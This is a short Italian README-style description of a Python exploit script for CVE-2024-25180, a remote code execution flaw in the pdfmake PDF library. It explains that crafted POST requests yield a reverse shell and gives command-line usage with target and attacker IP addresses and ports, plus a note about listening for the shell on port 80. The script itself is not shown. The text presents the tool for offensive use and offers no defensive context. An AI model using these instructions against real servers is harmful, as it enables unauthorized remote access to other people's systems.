
Script di exploit in Python per CVE-2024-25180, una vulnerabilità di esecuzione remota di codice in pdfmake, che consegna una reverse shell tramite richieste POST appositamente costruite.
pdfmake è uno strumento di stampa PDF puramente JavaScript lato client/server. Le versioni interessate di questo pacchetto sono vulnerabili ad attacchi di iniezione di codice arbitrario. Un attaccante può eseguire codice arbitrario/pdf inviando una richiesta POST appositamente progettata al percorso. Un attaccante può eseguire codice arbitrario sul sistema inviando una richiesta appositamente progettata.
CVE-2024-25180 Esecuzione di codice remoto in pdfmake
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>
python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80
In ascolto sulla porta 80, è possibile ottenere una reverse shell.
